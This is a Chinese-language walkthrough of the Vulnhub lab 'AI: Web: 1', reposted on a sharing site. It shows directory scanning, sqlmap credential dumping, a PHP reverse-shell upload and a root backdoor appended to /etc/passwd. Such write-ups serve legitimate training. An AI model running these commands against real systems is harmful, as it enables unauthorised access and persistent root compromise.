打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
AI: Web: 1 Vulnhub Walkthrough

下载链接:

https://www.vulnhub.com/entry/ai-web-1,353/

 

主机发现扫描:

 

主机端口扫描

 

http://10.10.202.158/

 

目录扫描:

╰─ sudo python3 dirsearch.py -u http://10.10.202.158 -e .php

[17:11:29] 200 - 141B - /index.html
[17:11:37] 200 - 82B - /robots.txt

 

分别进行目录探测:

╰─ sudo python3 dirsearch.py -u http://10.10.202.158/m3diNf0/ -e .php

[17:12:31] 200 -   84KB - /m3diNf0/info.php

╰─ sudo python3 dirsearch.py -u http://10.10.202.158/se3reTdir777/ -e .php

[17:14:54] 200 - 1KB - /se3reTdir777/index.php
[17:14:54] 200 - 1KB - /se3reTdir777/index.php/login/
[17:15:09] 301 - 250B - /se3reTdir777/uploads -> http://10.10.202.158/se3reTdir777/uploads/

 

SQL注入攻击

╰─ sqlmap -r ai.txt --dbs --batch 

 

╰─ sqlmap -r ai.txt --dbs --batch --dbs -D aiweb1 -T systemUser -C id,username,password --dump

base64 解密分别为:

t00r           RmFrZVVzZXJQYXNzdzByZA==   ----> FakeUserPassw0rd 
aiweb1pwn TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== --> MyEvilPass_f908sdaf9_sadfasf0sa
u3er          TjB0VGhpczBuZUFsczA=  ---> N0tThis0neAls0 

再次爆破未发现可登陆的后台地址,尝试下sqlmap 的os-shell

╰─ sqlmap -r ai.txt --dbs  --dbs --os-shell

 

 

应该是没有写入权限,我们尝试下upload目录

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 

通过这个地址上传shell:

http://10.10.202.158:80/se3reTdir777/uploads/tmpuvuka.php 长传php-reverse.php

 

 

接下来进行提权操作

LinEnum.sh

 

╰─ openssl passwd -1 -salt hack403 pass123
$1$hack403$bsTXjmsCRF5fUFoYkS1io/

echo 'hack403:$1$hack403$bsTXjmsCRF5fUFoYkS1io/:0:0::/root:/bin/bash' >>/etc/passwd

 

完!

 

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
10大常用渗透测试工具
深入浅出玩转SQL注入(含过狗下篇)
SQLMAP注入教程-11种常见SQLMAP使用方法详解
SQL注入
SQL注入—POST注入和HEAD注入
如何在没有ROOT访问的Android上执行SQL注入
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服